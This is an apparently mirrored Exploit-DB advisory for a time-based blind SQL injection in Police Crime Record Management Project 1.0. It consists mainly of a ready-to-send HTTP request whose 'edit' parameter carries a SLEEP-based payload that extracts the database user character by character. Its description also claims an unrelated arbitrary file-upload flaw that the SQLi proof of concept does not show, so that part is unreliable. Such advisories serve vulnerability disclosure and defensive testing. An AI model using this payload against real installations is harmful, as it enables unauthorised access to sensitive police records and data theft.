Police Crime Record Management Project 1.0 – Time Based SQLi

  • 作者: ()t/\\/\\1
    日期: 2021-09-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50327/
  • # Exploit Title: Police Crime Record Management Project 1.0 - Time Based SQLi
    # Exploit Author: ()t/\/\1
    # Date: 23/09/2021
    # Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
    # Tested on: Linux
    # Version: 1.0
    
    # Exploit Description:
    The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
    
    The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'edit' GET parameter in 'http://127.0.0.1//ghpolice/admin/investigation.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.
    
    # PoC request 
    
    GET /ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+- HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
    Upgrade-Insecure-Requests: 1